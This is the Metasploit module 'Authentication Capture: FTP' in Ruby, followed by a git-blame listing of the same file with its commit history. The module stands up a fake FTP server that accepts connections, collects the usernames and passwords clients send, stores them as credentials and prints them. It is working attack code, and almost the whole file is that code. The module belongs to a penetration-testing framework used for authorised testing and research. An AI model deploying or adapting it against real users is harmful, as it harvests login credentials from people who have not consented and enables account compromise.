modules/auxiliary/server/capture/ftp.rb

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Auxiliary
  include Msf::Exploit::Remote::TcpServer
  include Msf::Auxiliary::Report

  def initialize
    super(
      'Name'        => 'Authentication Capture: FTP',
      'Description'    => %q{
          This module provides a fake FTP service that
        is designed to capture authentication credentials.
      },
      'Author'      => ['ddz', 'hdm'],
      'License'     => MSF_LICENSE,
      'Actions'     =>
        [
          [ 'Capture', 'Description' => 'Run FTP capture server' ]
        ],
      'PassiveActions' =>
        [
          'Capture'
        ],
      'DefaultAction'  => 'Capture'
    )

    register_options(
      [
        OptPort.new('SRVPORT',  [ true, "The local port to listen on.", 21 ]),
        OptString.new('BANNER', [ true, "The server banner",  'FTP Server Ready'])
      ])
  end

  def setup
    super
    @state = {}
  end

  def run
    exploit()
  end

  def on_client_connect(c)
    @state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil}
    c.put "220 #{datastore['BANNER']}\r\n"
  end

  def report_cred(opts)
    service_data = {
      address: opts[:ip],
      port: opts[:port],
      service_name: opts[:service_name],
      protocol: 'tcp',
      workspace_id: myworkspace_id
    }

    credential_data = {
      origin_type: :service,
      module_fullname: fullname,
      username: opts[:user],
      private_data: opts[:password],
      private_type: :password
    }.merge(service_data)

    login_data = {
      core: create_credential(credential_data),
      status: Metasploit::Model::Login::Status::UNTRIED,
      proof: opts[:proof]
    }.merge(service_data)

    create_credential_login(login_data)
  end

  def on_client_data(c)
    data = c.get_once
    return if not data
    cmd,arg = data.strip.split(/\s+/, 2)
    arg ||= ""

    if(cmd.upcase == "USER")
      @state[c][:user] = arg
      c.put "331 User name okay, need password...\r\n"
      return
    end

    if(cmd.upcase == "QUIT")
      c.put "221 Logout\r\n"
      return
    end

    if(cmd.upcase == "PASS")
      @state[c][:pass] = arg

      report_cred(
        ip: @state[c][:ip],
        port: datastore['SRVPORT'],
        service_name: 'ftp',
        user: @state[c][:user],
        password: @state[c][:pass],
        proof: arg
      )

      print_good("FTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")
    end

    @state[c][:pass] = data.strip
    c.put "500 Error\r\n"
    return

  end

  def on_client_close(c)
    @state.delete(c)
  end


end
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`##`
use https for metaploit.com links 2017-07-24 06:26:21 -07:00			`# This module requires Metasploit: https://metasploit.com/download`
Redo the boilerplate / splat 2013-10-15 13:50:46 -05:00			`# Current source: https://github.com/rapid7/metasploit-framework`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`##`

use MetasploitModule as a class name 2016-03-08 14:02:44 +01:00			`class MetasploitModule < Msf::Auxiliary`
This massive commit changes the metasploit 3 module format. The new syntax allows for greater scalability and future improvements to the metasploit module loader. This change also makes it easier for users to add new modules, since the class name no longer needs to match the directory structure. 2008-10-02 05:23:59 +00:00			`include Msf::Exploit::Remote::TcpServer`
			`include Msf::Auxiliary::Report`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`def initialize`
			`super(`
			`'Name' => 'Authentication Capture: FTP',`
			`'Description' => %q{`
more cleanups 2010-05-03 17:13:09 +00:00			`This module provides a fake FTP service that`
			`is designed to capture authentication credentials.`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`},`
			`'Author' => ['ddz', 'hdm'],`
			`'License' => MSF_LICENSE,`
			`'Actions' =>`
			`[`
Add descriptions to auxiliary modules Actions 2020-05-12 22:15:21 +02:00			`[ 'Capture', 'Description' => 'Run FTP capture server' ]`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`],`
big module whitespace/formatting cleanup pass 2010-04-30 08:40:19 +00:00			`'PassiveActions' =>`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`[`
			`'Capture'`
			`],`
			`'DefaultAction' => 'Capture'`
			`)`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`register_options(`
			`[`
ftp capture 2018-11-04 21:46:01 -05:00			`OptPort.new('SRVPORT', [ true, "The local port to listen on.", 21 ]),`
			`OptString.new('BANNER', [ true, "The server banner", 'FTP Server Ready'])`
Fix msf/core and self.class msftidy warnings 2017-05-03 15:42:21 -05:00			`])`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`def setup`
			`super`
			`@state = {}`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`def run`
			`exploit()`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`def on_client_connect(c)`
			`@state[c] = {:name => "#{c.peerhost}:#{c.peerport}", :ip => c.peerhost, :port => c.peerport, :user => nil, :pass => nil}`
ftp capture 2018-11-04 21:46:01 -05:00			`c.put "220 #{datastore['BANNER']}\r\n"`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Use metasploit-credential API instead of report_auth_info 2015-07-22 01:11:43 -05:00			`def report_cred(opts)`
			`service_data = {`
			`address: opts[:ip],`
			`port: opts[:port],`
			`service_name: opts[:service_name],`
			`protocol: 'tcp',`
			`workspace_id: myworkspace_id`
			`}`

			`credential_data = {`
			`origin_type: :service,`
			`module_fullname: fullname,`
			`username: opts[:user],`
			`private_data: opts[:password],`
More metasploit-credential update 2015-07-23 15:50:50 -05:00			`private_type: :password`
Use metasploit-credential API instead of report_auth_info 2015-07-22 01:11:43 -05:00			`}.merge(service_data)`

			`login_data = {`
			`core: create_credential(credential_data),`
			`status: Metasploit::Model::Login::Status::UNTRIED,`
			`proof: opts[:proof]`
			`}.merge(service_data)`

			`create_credential_login(login_data)`
			`end`

Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`def on_client_data(c)`
			`data = c.get_once`
			`return if not data`
			`cmd,arg = data.strip.split(/\s+/, 2)`
			`arg \|\|= ""`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`if(cmd.upcase == "USER")`
			`@state[c][:user] = arg`
			`c.put "331 User name okay, need password...\r\n"`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`if(cmd.upcase == "QUIT")`
			`c.put "221 Logout\r\n"`
			`return`
			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`if(cmd.upcase == "PASS")`
			`@state[c][:pass] = arg`
Retab modules 2013-08-30 16:28:54 -05:00
Use metasploit-credential API instead of report_auth_info 2015-07-22 01:11:43 -05:00			`report_cred(`
			`ip: @state[c][:ip],`
			`port: datastore['SRVPORT'],`
			`service_name: 'ftp',`
			`user: @state[c][:user],`
			`password: @state[c][:pass],`
			`proof: arg`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`)`
Retab modules 2013-08-30 16:28:54 -05:00
More print_status -> print_good 2017-07-19 11:39:15 +01:00			`print_good("FTP LOGIN #{@state[c][:name]} #{@state[c][:user]} / #{@state[c][:pass]}")`
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`@state[c][:pass] = data.strip`
			`c.put "500 Error\r\n"`
			`return`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`end`
Retab modules 2013-08-30 16:28:54 -05:00
Lots of updates related to <secret project X>. 2008-03-02 04:46:13 +00:00			`def on_client_close(c)`
			`@state.delete(c)`
			`end`


targ_host -> target_host 2010-03-25 01:09:04 +00:00			`end`